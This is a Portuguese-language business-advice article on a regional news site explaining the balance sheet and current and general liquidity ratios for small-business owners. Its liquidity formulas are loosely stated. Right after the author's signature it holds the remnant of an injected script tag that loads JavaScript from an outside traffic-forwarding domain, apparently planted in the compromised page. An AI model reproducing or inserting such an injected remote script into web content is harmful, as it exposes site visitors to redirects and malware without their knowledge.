InícioDestaqueTemporada 4 etapas – Porque eu vendo muito, mas não vejo dinheiro...

Temporada 4 etapas – Porque eu vendo muito, mas não vejo dinheiro sobrar?

Últimas notícias

Em ação rápida policias recuperam veículo roubado em Canoinhas

Nesta quinta-feira, 20, a Polícia Militar foi  acionada para...

Mulher vítima de violência doméstica aciona a PM através do botão do pânico

Na manhã desta quinta-feira, 20, uma mulher vítima de...

Pessoal, boa semana pra vocês.

Vamos continuar a 3ª ETAPA, com a explanação da nossa temporada referente aos esconderijos do seu dinheiro na “complexa” matemática da sua empresa.

 

Tenho certeza de que muitos já foram corrigir os detalhes dos quais falamos na semana passada. Se você teve resultado, escreva um comentário. Isso motivará mais pessoas a mudar…

 

Prontos para a terceira etapa da nossa temporada?

Vamos lá?

Demonstrativo Patrimonial

 

O Demonstrativo Patrimonial nada mais é do que uma demonstração ou um relatório dos seus bens e direitos que se referem a empresa. Você já ouviu falar de ativo e passivo? Pois é….essas duas GRANDEZAS é que mostram esses números, porém dentro dessas grandezas, existem alguns sub grupos que dividem seu dinheiro e mostram exatamente onde ele está…..Ai começa a ficar divertido analisar para começar a encontrar onde seu dinheiro está parado.

 

Muito bem. O DPA é uma ferramenta de fundamental importância para a gestão da empresa, pois é nesse demonstrativo que o que estava obscuro vem à tona. Esse demonstrativo é composto por Ativo e Passivo. Os ativos são os direitos e o Passivo são as obrigações. Porém, o Ativo é composto por alguns grupos: Disponível, Circulante, Realizável a Longo Prazo e Imobilizado. Logo o Passivo é composto por dois grupos: Passivo Circulante e Passivo Exigível a Longo Prazo.

 

Vamos encontrar nosso dinheiro no Ativo Disponível (Caixa e Bancos), Ativo Circulante (Estoques, Contas a Receber, Contas a Receber Vencidas), Ativo Realizável a Longo Prazo (Consórcios, Financiamentos, Investimentos) e no Ativo Imobilizado (Terrenos, Prédios, Equipamentos). Muitas vezes não percebemos mas imobilizamos capital nessas contas descritas acima……tenho certeza de que se você for procurar, você vai e encontrar respostas inacreditáveis….

 

Índice de Liquidez Corrente

O índice de liquidez corrente é um indicador que mostra com nitidez, se você pegar o dinheiro disponível dos caixas e bancos, estoques e contas a receber e confrontar com o total do seu passivo, será que você consegue pagar suas contas? A conta é: Ativo Disponível + Ativo Circulante / Passivo Total x 100. O resultado indicará, que, para cada R$ 1,00 que você deve, quanto você terá para pagar.

 

Esse índice é de extrema importância, pois ele mostrará se você tem dinheiro suficiente para pagar suas obrigações sem vender imóveis ou bens.

 

Índice de liquidez Geral

O índice de liquidez geral é um indicador que mostra claramente, se você pegar o dinheiro disponível dos caixas e bancos, estoques, contas a receber, terrenos, prédios e equipamentos e confrontar com o total do seu passivo, será que você consegue pagar suas contas? A conta é: Ativo Total / Passivo Total x 100. O resultado indicará, que, para cada R$ 1,00 que você deve, quanto você terá para pagar.

 

Esse índice é de decisivo, pois ele mostrará se você tem dinheiro suficiente para pagar suas obrigações que constam no Passivo Total.

 

Acho que por hoje é isso…

 

Fica a dica, e na próxima semana continuamos com as explicações…

Espero que tenham gostado.

Qualquer dúvida estou a disposição.

Abraço,

Prof. Christian… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe Gazeta
Equipe Gazetahttps://gazetanortesc.com.br
Somos um jornal de notícias e classificados gratuitos. Estamos há 25 anos no mercado e nosso principal diferencial é o jornal digital.